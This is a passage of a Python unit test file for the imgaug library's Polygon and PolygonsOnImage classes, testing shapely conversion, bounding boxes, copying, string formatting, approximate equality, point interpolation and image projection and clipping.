        raised = False
        try:
            _ = polygon.change_first_point_by_index(bad_index)
        except AssertionError:
            raised = True
        assert raised
def test_Polygon_to_shapely_line_string():
    """Check to_shapely_line_string(): plain conversion, the closed flag,
    point interpolation and the <2 points error case."""
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    ls = poly.to_shapely_line_string()
    assert np.allclose(ls.coords, np.float32([[0, 0], [1, 0], [1, 1]]))
    # two point polygon
    poly = ia.Polygon([(0, 0), (1, 0)])
    ls = poly.to_shapely_line_string()
    assert np.allclose(ls.coords, np.float32([[0, 0], [1, 0]]))
    # one point polygon
    poly = ia.Polygon([(0, 0)])
    got_exception = False
    try:
        _ = poly.to_shapely_line_string()
    except Exception as exc:
        assert "Conversion to shapely line string requires at least two points" in str(exc)
        got_exception = True
    assert got_exception
    # zero point polygon
    poly = ia.Polygon([])
    got_exception = False
    try:
        _ = poly.to_shapely_line_string()
    except Exception as exc:
        assert "Conversion to shapely line string requires at least two points" in str(exc)
        got_exception = True
    assert got_exception
    # closed line string
    # (closed=True appends the first point again at the end)
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    ls = poly.to_shapely_line_string(closed=True)
    assert np.allclose(ls.coords, np.float32([[0, 0], [1, 0], [1, 1], [0, 0]]))
    # interpolation
    # (interpolate=1 inserts one evenly spaced point on every edge)
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    ls = poly.to_shapely_line_string(interpolate=1)
    assert np.allclose(ls.coords, np.float32([[0, 0], [0.5, 0], [1, 0], [1, 0.5], [1, 1], [0.5, 0.5]]))
    # interpolation with 2 steps
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    ls = poly.to_shapely_line_string(interpolate=2)
    assert np.allclose(ls.coords, np.float32([
        [0, 0], [1/3, 0], [2/3, 0],
        [1, 0], [1, 1/3], [1, 2/3],
        [1, 1], [2/3, 2/3], [1/3, 1/3]
    ]))
    # interpolation with closed=True
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1)])
    ls = poly.to_shapely_line_string(closed=True, interpolate=1)
    assert np.allclose(ls.coords, np.float32([[0, 0], [0.5, 0], [1, 0], [1, 0.5], [1, 1], [0.5, 0.5], [0, 0]]))
def test_Polygon_to_shapely_polygon():
    """Conversion to shapely.geometry.Polygon must keep all exterior coords."""
    exterior = [(0, 0), (1, 0), (1, 1), (0, 1)]
    converted = ia.Polygon(exterior).to_shapely_polygon()
    for (x_exp, y_exp), (x_obs, y_obs) in zip(exterior, converted.exterior.coords):
        assert x_exp - 1e-8 < x_obs < x_exp + 1e-8
        assert y_exp - 1e-8 < y_obs < y_exp + 1e-8
def test_Polygon_to_bounding_box():
    """The bounding box must be the min/max over the exterior coordinates."""
    cases = [
        ([(0, 0), (1, 0), (1, 1), (0, 1)], (0, 0, 1, 1)),      # axis-aligned square
        ([(0.5, 0), (1, 1), (0, 1)], (0, 0, 1, 1)),            # triangle
        ([(0.5, 0.5), (2, 0.1), (1, 1)], (0.5, 0.1, 2.0, 1.0)),  # irregular triangle
    ]
    for exterior, (x1, y1, x2, y2) in cases:
        bb = ia.Polygon(exterior).to_bounding_box()
        assert x1 - 1e-8 < bb.x1 < x1 + 1e-8
        assert y1 - 1e-8 < bb.y1 < y1 + 1e-8
        assert x2 - 1e-8 < bb.x2 < x2 + 1e-8
        assert y2 - 1e-8 < bb.y2 < y2 + 1e-8
def test_Polygon_from_shapely():
    """Polygon.from_shapely must round-trip the exterior coordinates."""
    exterior = [(0, 0), (1, 0), (1, 1), (0, 1)]
    poly_shapely = shapely.geometry.Polygon(exterior)
    poly = ia.Polygon.from_shapely(poly_shapely)
    # shapely messes up the point ordering, so we try to correct it here
    start_idx = 0
    for i, (x, y) in enumerate(poly.exterior):
        # BUGFIX: the original used `x` in BOTH squared terms, so the
        # euclidean distance to the expected first corner was computed
        # incorrectly; the second term must use `y`.
        dist = np.sqrt((exterior[0][0] - x) ** 2 + (exterior[0][1] - y) ** 2)
        if dist < 1e-4:
            start_idx = i
            break
    poly = poly.change_first_point_by_index(start_idx)
    for (x_exp, y_exp), (x_obs, y_obs) in zip(exterior, poly.exterior):
        assert x_exp - 1e-8 < x_obs < x_exp + 1e-8
        assert y_exp - 1e-8 < y_obs < y_exp + 1e-8
    # empty polygon
    poly_shapely = shapely.geometry.Polygon([])
    poly = ia.Polygon.from_shapely(poly_shapely)
    assert len(poly.exterior) == 0
def test_Polygon_copy():
    """copy() must duplicate exterior dtype/shape/values and the label."""
    original = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
    duplicate = original.copy()
    assert duplicate.exterior.dtype.type == original.exterior.dtype.type
    assert duplicate.exterior.shape == original.exterior.shape
    assert np.allclose(duplicate.exterior, original.exterior)
    assert duplicate.label == original.label
def test_Polygon_deepcopy():
    """deepcopy() must copy all attributes and fully decouple the copy."""
    original = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
    duplicate = original.deepcopy()
    assert duplicate.exterior.dtype.type == original.exterior.dtype.type
    assert duplicate.exterior.shape == original.exterior.shape
    assert np.allclose(duplicate.exterior, original.exterior)
    assert duplicate.label == original.label
    # mutating the deep copy must not affect the original
    original = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test")
    duplicate = original.deepcopy()
    duplicate.exterior[0, 0] = 100.0
    duplicate.label = "test2"
    assert duplicate.exterior.dtype.type == original.exterior.dtype.type
    assert duplicate.exterior.shape == original.exterior.shape
    assert not np.allclose(original.exterior, duplicate.exterior)
    assert not original.label == duplicate.label
def test_Polygon___repr__():
    """repr(poly) must match the shared repr/str string expectations."""
    _test_Polygon_repr_str(repr)
def test_Polygon___str__():
    """str(poly) must match the shared repr/str string expectations."""
    _test_Polygon_repr_str(str)
def _test_Polygon_repr_str(func):
    """Shared checks for Polygon.__repr__/__str__ string formatting.

    ``func`` converts a polygon to its string form (repr or str).
    """
    cases = [
        # integer coordinates are still printed with three decimals
        (ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label="test"),
         "Polygon([(x=0.000, y=0.000), (x=1.000, y=0.000), (x=1.000, y=1.000), (x=0.000, y=1.000)] "
         "(4 points), label=test)"),
        # float coordinates
        (ia.Polygon([(0, 0.5), (1.5, 0), (1, 1), (0, 1)], label="test"),
         "Polygon([(x=0.000, y=0.500), (x=1.500, y=0.000), (x=1.000, y=1.000), (x=0.000, y=1.000)] "
         "(4 points), label=test)"),
        # label=None is printed literally
        (ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)], label=None),
         "Polygon([(x=0.000, y=0.000), (x=1.000, y=0.000), (x=1.000, y=1.000), (x=0.000, y=1.000)] "
         "(4 points), label=None)"),
        # empty exterior
        (ia.Polygon([], label="test"),
         "Polygon([] (0 points), label=test)"),
    ]
    for polygon, expected in cases:
        assert func(polygon) == expected
def test_Polygon_exterior_almost_equals():
    """Test Polygon.exterior_almost_equals() on equal, near-equal and unequal exteriors.

    Covers: identical exteriors, duplicated/added points that do not change
    the geometry, reordered points, sub-/super-tolerance shifts, and the
    degenerate cases of polygons with 0, 1 or 2 points.
    """
    # exactly same exterior
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    assert poly_a.exterior_almost_equals(poly_b)
    # one point duplicated
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(0, 0), (1, 0), (1, 1), (1, 1), (0, 1)])
    assert poly_a.exterior_almost_equals(poly_b)
    # several points added without changing geometry
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(0, 0), (0.5, 0), (1, 0), (1, 0.5), (1, 1), (0.5, 1), (0, 1), (0, 0.5)])
    assert poly_a.exterior_almost_equals(poly_b)
    # different order
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(0, 1), (1, 1), (1, 0), (0, 0)])
    assert poly_a.exterior_almost_equals(poly_b)
    # tiny shift below tolerance
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(0+1e-6, 0), (1+1e-6, 0), (1+1e-6, 1), (0+1e-6, 1)])
    assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-3)
    # tiny shift above tolerance
    # (same 1e-6 shift as above, but max_distance is now far smaller than it)
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(0+1e-6, 0), (1+1e-6, 0), (1+1e-6, 1), (0+1e-6, 1)])
    assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-9)
    # shifted polygon towards half overlap
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(0.5, 0), (1.5, 0), (1.5, 1), (0.5, 1)])
    assert not poly_a.exterior_almost_equals(poly_b)
    # shifted polygon towards no overlap at all
    poly_a = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(100, 0), (101, 0), (101, 1), (100, 1)])
    assert not poly_a.exterior_almost_equals(poly_b)
    # both polygons without points
    poly_a = ia.Polygon([])
    poly_b = ia.Polygon([])
    assert poly_a.exterior_almost_equals(poly_b)
    # both polygons with one point
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0)])
    assert poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(100, 100)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0+1e-6, 0)])
    assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0+1, 0)])
    assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
    # both polygons with two points
    poly_a = ia.Polygon([(0, 0), (1, 0)])
    poly_b = ia.Polygon([(0, 0), (1, 0)])
    assert poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (0, 0)])
    poly_b = ia.Polygon([(0, 0), (0, 0)])
    assert poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (1, 0)])
    poly_b = ia.Polygon([(0, 0), (2, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (1, 0)])
    poly_b = ia.Polygon([(0+1e-6, 0), (1+1e-6, 0)])
    assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
    # both polygons with three points
    poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    assert poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    poly_b = ia.Polygon([(0, 0), (1, -1), (0.5, 1)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    poly_b = ia.Polygon([(0, 0), (1+1e-6, 0), (0.5, 1)])
    assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
    # one polygon with zero points, other with one
    poly_a = ia.Polygon([])
    poly_b = ia.Polygon([(0, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([])
    assert not poly_a.exterior_almost_equals(poly_b)
    # one polygon with one point, other with two
    poly_a = ia.Polygon([(-10, -20)])
    poly_b = ia.Polygon([(0, 0), (1, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (1, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (1, 0)])
    poly_b = ia.Polygon([(0, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    # duplicate points collapse to the same geometry as a single point
    poly_a = ia.Polygon([(0, 0), (0, 0)])
    poly_b = ia.Polygon([(0, 0)])
    assert poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0, 0)])
    assert poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (0+1e-6, 0)])
    poly_b = ia.Polygon([(0, 0)])
    assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
    poly_a = ia.Polygon([(0, 0), (0+1e-4, 0)])
    poly_b = ia.Polygon([(0, 0)])
    assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-9)
    # one polygon with one point, other with three
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    poly_b = ia.Polygon([(0, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0, 0), (0, 0)])
    assert poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0, 0), (1, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (1, 0), (0, 0)])
    assert not poly_a.exterior_almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0+1e-6, 0), (0, 0+1e-6)])
    assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-2)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0+1e-4, 0), (0, 0+1e-4)])
    assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-9)
    # two polygons that are different, but with carefully placed points so that interpolation between polygon
    # points is necessary to spot the difference
    poly_a = ia.Polygon([(1, 0), (1, 1), (0, 1)])
    poly_b = ia.Polygon([(1, 0), (1, 1), (0, 1), (1-1e-6, 1-1e-6)])
    assert poly_a.exterior_almost_equals(poly_b, max_distance=1e-4, interpolate=0)
    assert not poly_a.exterior_almost_equals(poly_b, max_distance=1e-4, interpolate=1)
def test_Polygon_almost_equals():
    """Test Polygon.almost_equals(), which compares exteriors AND labels."""
    # empty polygons are equal
    poly_a = ia.Polygon([])
    poly_b = ia.Polygon([])
    assert poly_a.almost_equals(poly_b)
    # single identical point
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0)])
    assert poly_a.almost_equals(poly_b)
    # duplicated points do not change the geometry
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0, 0)])
    assert poly_a.almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0, 0), (0, 0)])
    assert poly_a.almost_equals(poly_b)
    # shift far below the tolerance still counts as equal
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (0+1e-10, 0)])
    assert poly_a.almost_equals(poly_b)
    # differing labels (None vs set) make polygons unequal ...
    poly_a = ia.Polygon([(0, 0)], label="test")
    poly_b = ia.Polygon([(0, 0)])
    assert not poly_a.almost_equals(poly_b)
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0)], label="test")
    assert not poly_a.almost_equals(poly_b)
    # ... while identical labels keep them equal
    poly_a = ia.Polygon([(0, 0)], label="test")
    poly_b = ia.Polygon([(0, 0)], label="test")
    assert poly_a.almost_equals(poly_b)
    # same label but different geometry
    poly_a = ia.Polygon([(0, 0)], label="test")
    poly_b = ia.Polygon([(1, 0)], label="test")
    assert not poly_a.almost_equals(poly_b)
    # same geometry but different labels
    poly_a = ia.Polygon([(0, 0)], label="testA")
    poly_b = ia.Polygon([(0, 0)], label="testB")
    assert not poly_a.almost_equals(poly_b)
    # identical triangle
    poly_a = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    assert poly_a.almost_equals(poly_b)
    # point vs triangle
    poly_a = ia.Polygon([(0, 0)])
    poly_b = ia.Polygon([(0, 0), (1, 0), (0.5, 1)])
    assert not poly_a.almost_equals(poly_b)
    # comparison against a non-Polygon object is never equal
    poly_a = ia.Polygon([(0, 0)])
    assert not poly_a.almost_equals("foo")
def test___convert_points_to_shapely_line_string():
    """Placeholder.

    TODO: the function appears to already be fully covered by other tests;
    write a dedicated test later.
    """
def test__interpolate_point_pair():
    """_interpolate_point_pair() must return `nb` evenly spaced points between two points."""
    start = (0, 0)
    end = (1, 2)
    # one interpolation point: the midpoint of the segment
    assert np.allclose(
        _interpolate_point_pair(start, end, 1),
        np.float32([
            [0.5, 1.0]
        ])
    )
    # two interpolation points: at 1/3 and 2/3 along the segment
    assert np.allclose(
        _interpolate_point_pair(start, end, 2),
        np.float32([
            [1*1/3, 1*2/3],
            [2*1/3, 2*2/3]
        ])
    )
    # zero interpolation points: empty result
    assert len(_interpolate_point_pair(start, end, 0)) == 0
def test__interpolate_points():
    """Test _interpolate_points() for 0, 1, 2 and 3 input points.

    The expected outputs show that with ``closed`` left at its default, the
    segment between the last and the first point is interpolated too, while
    ``closed=False`` omits those trailing interpolation points.
    """
    # 2 points
    points = [
        (0, 0),
        (1, 2)
    ]
    # 0 interpolation points -> input returned unchanged
    inter = _interpolate_points(points, 0)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [1, 2]
        ])
    )
    inter = _interpolate_points(points, 1)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0.5, 1.0],
            [1, 2],
            [0.5, 1.0]
        ])
    )
    inter = _interpolate_points(points, 1, closed=False)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0.5, 1.0],
            [1, 2]
        ])
    )
    # 3 points
    points = [
        (0, 0),
        (1, 2),
        (0.5, 3)
    ]
    inter = _interpolate_points(points, 0)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [1, 2],
            [0.5, 3]
        ])
    )
    inter = _interpolate_points(points, 1)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0.5, 1.0],
            [1, 2],
            [0.75, 2.5],
            [0.5, 3],
            [0.25, 1.5]
        ])
    )
    inter = _interpolate_points(points, 1, closed=False)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0.5, 1.0],
            [1, 2],
            [0.75, 2.5],
            [0.5, 3]
        ])
    )
    # 0 points
    points = []
    inter = _interpolate_points(points, 1)
    assert len(inter) == 0
    # 1 point
    # a single point has no segments, so nothing can be interpolated
    points = [(0, 0)]
    inter = _interpolate_points(points, 0)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0]
        ])
    )
    inter = _interpolate_points(points, 1)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0]
        ])
    )
def test__interpolate_points_by_max_distance():
    """Test _interpolate_points_by_max_distance() for 0, 1, 2 and 3 input points.

    Points are inserted until no segment is longer than ``max_distance``.
    With ``closed`` left at its default, the last-to-first segment is also
    interpolated; ``closed=False`` omits those trailing points.
    """
    # 2 points
    points = [
        (0, 0),
        (0, 2)
    ]
    # max distance larger than any segment -> input returned unchanged
    inter = _interpolate_points_by_max_distance(points, 10000)
    assert np.allclose(
        inter,
        points
    )
    inter = _interpolate_points_by_max_distance(points, 1.0)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0, 1.0],
            [0, 2],
            [0, 1.0]
        ])
    )
    inter = _interpolate_points_by_max_distance(points, 1.0, closed=False)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0, 1.0],
            [0, 2]
        ])
    )
    # 3 points
    points = [
        (0, 0),
        (0, 2),
        (2, 0)
    ]
    inter = _interpolate_points_by_max_distance(points, 1.0)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0, 1.0],
            [0, 2],
            [1.0, 1.0],
            [2, 0],
            [1.0, 0]
        ])
    )
    inter = _interpolate_points_by_max_distance(points, 1.0, closed=False)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0],
            [0, 1.0],
            [0, 2],
            [1.0, 1.0],
            [2, 0]
        ])
    )
    # 0 points
    points = []
    inter = _interpolate_points_by_max_distance(points, 1.0)
    assert len(inter) == 0
    # 1 points
    # a single point has no segments, so nothing can be interpolated
    points = [(0, 0)]
    inter = _interpolate_points_by_max_distance(points, 1.0)
    assert np.allclose(
        inter,
        np.float32([
            [0, 0]
        ])
    )
class TestPolygonsOnImage(unittest.TestCase):
    """Tests for ia.PolygonsOnImage.

    Fix over the previous version: ``test__str__`` called ``__repr__()``
    instead of ``__str__()`` in both assertions and therefore never
    exercised ``__str__`` at all.
    """

    def setUp(self):
        reseed()

    def test__init__(self):
        # standard case with one polygon
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])],
            shape=(10, 10, 3)
        )
        assert len(poly_oi.polygons) == 1
        assert np.allclose(
            poly_oi.polygons[0].exterior,
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0, atol=1e-4)
        assert poly_oi.shape == (10, 10, 3)

        # standard case with multiple polygons
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)]),
             ia.Polygon([(0, 0), (1, 0), (1, 1)]),
             ia.Polygon([(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)])],
            shape=(10, 10, 3)
        )
        assert len(poly_oi.polygons) == 3
        assert np.allclose(
            poly_oi.polygons[0].exterior,
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0, atol=1e-4)
        assert np.allclose(
            poly_oi.polygons[1].exterior,
            [(0, 0), (1, 0), (1, 1)],
            rtol=0, atol=1e-4)
        assert np.allclose(
            poly_oi.polygons[2].exterior,
            [(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)],
            rtol=0, atol=1e-4)
        assert poly_oi.shape == (10, 10, 3)

        # list of polygons is empty
        poly_oi = ia.PolygonsOnImage(
            [],
            shape=(10, 10, 3)
        )
        assert len(poly_oi.polygons) == 0

        # invalid polygon (self-intersecting exterior) must still be accepted
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(0, 0), (0.5, 0), (0.5, 1.5), (0, 1), (1, 1), (0, 1)])],
            shape=(10, 10, 3)
        )
        assert len(poly_oi.polygons) == 1
        assert np.allclose(
            poly_oi.polygons[0].exterior,
            [(0, 0), (0.5, 0), (0.5, 1.5), (0, 1), (1, 1), (0, 1)],
            rtol=0, atol=1e-4)

        # shape given as numpy array (shape is derived from the array)
        poly_oi = ia.PolygonsOnImage(
            [],
            shape=np.zeros((10, 10, 3), dtype=np.uint8)
        )
        assert poly_oi.shape == (10, 10, 3)

        # 2D shape
        poly_oi = ia.PolygonsOnImage(
            [],
            shape=(10, 11)
        )
        assert poly_oi.shape == (10, 11)

    def test_empty(self):
        # standard case with multiple polygons
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)]),
             ia.Polygon([(0, 0), (1, 0), (1, 1)]),
             ia.Polygon([(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)])],
            shape=(10, 10, 3)
        )
        assert poly_oi.empty is False

        # list of polygons is empty
        poly_oi = ia.PolygonsOnImage([], shape=(10, 10, 3))
        assert poly_oi.empty is True

    def test_on(self):
        # size unchanged
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)]),
             ia.Polygon([(0, 0), (1, 0), (1, 1)]),
             ia.Polygon([(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)])],
            shape=(1, 1, 3)
        )
        poly_oi_proj = poly_oi.on((1, 1, 3))
        assert np.allclose(
            poly_oi_proj.polygons[0].exterior,
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0, atol=1e-4)
        assert np.allclose(
            poly_oi_proj.polygons[1].exterior,
            [(0, 0), (1, 0), (1, 1)],
            rtol=0, atol=1e-4)
        assert np.allclose(
            poly_oi_proj.polygons[2].exterior,
            [(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)],
            rtol=0, atol=1e-4)
        assert poly_oi_proj.shape == (1, 1, 3)

        # 10x decrease in size
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(0, 0), (10, 0), (10, 10), (0, 10)]),
             ia.Polygon([(0, 0), (10, 0), (10, 10)]),
             ia.Polygon([(5, 0), (10, 5), (5, 10), (0, 5)])],
            shape=(10, 10, 3)
        )
        poly_oi_proj = poly_oi.on((1, 1, 3))
        assert np.allclose(
            poly_oi_proj.polygons[0].exterior,
            [(0, 0), (1, 0), (1, 1), (0, 1)],
            rtol=0, atol=1e-4)
        assert np.allclose(
            poly_oi_proj.polygons[1].exterior,
            [(0, 0), (1, 0), (1, 1)],
            rtol=0, atol=1e-4)
        assert np.allclose(
            poly_oi_proj.polygons[2].exterior,
            [(0.5, 0), (1, 0.5), (0.5, 1), (0, 0.5)],
            rtol=0, atol=1e-4)
        assert poly_oi_proj.shape == (1, 1, 3)

        # 2x increase in width, 10x decrease in height
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(0, 0), (50, 0), (50, 100), (0, 100)])],
            shape=(100, 100, 3)
        )
        poly_oi_proj = poly_oi.on((10, 200, 3))
        assert np.allclose(
            poly_oi_proj.polygons[0].exterior,
            [(0, 0), (100, 0), (100, 10), (0, 10)],
            rtol=0, atol=1e-4)
        assert poly_oi_proj.shape == (10, 200, 3)

    def test_draw_on_image(self):
        image = np.zeros((10, 10, 3), dtype=np.uint8)

        # no polygons, nothing changed
        poly_oi = ia.PolygonsOnImage([], shape=image.shape)
        image_drawn = poly_oi.draw_on_image(image)
        assert np.sum(image) == 0
        assert np.sum(image_drawn) == 0

        # draw two polygons; result must equal drawing both polygons
        # individually via Polygon.draw_on_image()
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (9, 1), (9, 9), (1, 9)]),
             ia.Polygon([(3, 3), (7, 3), (7, 7), (3, 7)])],
            shape=image.shape)
        image_expected = np.copy(image)
        image_expected = poly_oi.polygons[0].draw_on_image(image_expected)
        image_expected = poly_oi.polygons[1].draw_on_image(image_expected)
        image_drawn = poly_oi.draw_on_image(image)
        assert np.sum(image) == 0
        assert np.sum(image_drawn) > 0
        assert np.sum(image_expected) > 0
        assert np.allclose(image_drawn, image_expected)

    def test_remove_out_of_image(self):
        # no polygons, nothing to remove
        poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
        for fully, partly in [(False, False), (False, True),
                              (True, False), (True, True)]:
            poly_oi_rm = poly_oi.remove_out_of_image(fully=fully, partly=partly)
            assert len(poly_oi_rm.polygons) == 0
            assert poly_oi_rm.shape == (10, 11, 3)

        # one polygon, fully inside the image -> never removed
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (9, 1), (9, 9), (1, 9)])],
            shape=(10, 11, 3))
        for fully, partly in [(False, False), (False, True),
                              (True, False), (True, True)]:
            poly_oi_rm = poly_oi.remove_out_of_image(fully=fully, partly=partly)
            assert len(poly_oi_rm.polygons) == 1
            assert np.allclose(poly_oi_rm.polygons[0].exterior,
                               [(1, 1), (9, 1), (9, 9), (1, 9)],
                               rtol=0, atol=1e-4)
            assert poly_oi_rm.shape == (10, 11, 3)

        # two polygons, one partly outside, one fully outside
        poly_oi = ia.PolygonsOnImage(
            [ia.Polygon([(1, 1), (11, 1), (11, 9), (1, 9)]),
             ia.Polygon([(100, 100), (200, 100), (200, 200), (100, 200)])],
            shape=(10, 10, 3))

        # remove nothing
        poly_oi_rm = poly_oi.remove_out_of_image(fully=False, partly=False)
        assert len(poly_oi.polygons) == 2
        assert len(poly_oi_rm.polygons) == 2
        assert np.allclose(poly_oi_rm.polygons[0].exterior,
                           [(1, 1), (11, 1), (11, 9), (1, 9)],
                           rtol=0, atol=1e-4)
        assert np.allclose(poly_oi_rm.polygons[1].exterior,
                           [(100, 100), (200, 100), (200, 200), (100, 200)],
                           rtol=0, atol=1e-4)
        assert poly_oi_rm.shape == (10, 10, 3)

        # remove only the fully-outside polygon
        poly_oi_rm = poly_oi.remove_out_of_image(fully=True, partly=False)
        assert len(poly_oi.polygons) == 2
        assert len(poly_oi_rm.polygons) == 1
        assert np.allclose(poly_oi_rm.polygons[0].exterior,
                           [(1, 1), (11, 1), (11, 9), (1, 9)],
                           rtol=0, atol=1e-4)
        assert poly_oi_rm.shape == (10, 10, 3)

        # remove only the partly-outside polygon
        poly_oi_rm = poly_oi.remove_out_of_image(fully=False, partly=True)
        assert len(poly_oi.polygons) == 2
        assert len(poly_oi_rm.polygons) == 1
        assert np.allclose(poly_oi_rm.polygons[0].exterior,
                           [(100, 100), (200, 100), (200, 200), (100, 200)],
                           rtol=0, atol=1e-4)
        assert poly_oi_rm.shape == (10, 10, 3)

        # remove both
        poly_oi_rm = poly_oi.remove_out_of_image(fully=True, partly=True)
        assert len(poly_oi.polygons) == 2
        assert len(poly_oi_rm.polygons) == 0
        assert poly_oi_rm.shape == (10, 10, 3)

    def test_clip_out_of_image(self):
        # NOTE: clip_out_of_image() can change the order of points,
        # hence we check here for each expected point whether it appears
        # somewhere in the list of points
        def _any_point_close(points, point_search):
            # whether point_search is (approximately) among points
            for point in points:
                if np.allclose(point, point_search, atol=1e-4, rtol=0):
                    return True
            return False

        # no polygons
        poly_oi = ia.PolygonsOnImage([], shape=(10, 11, 3))
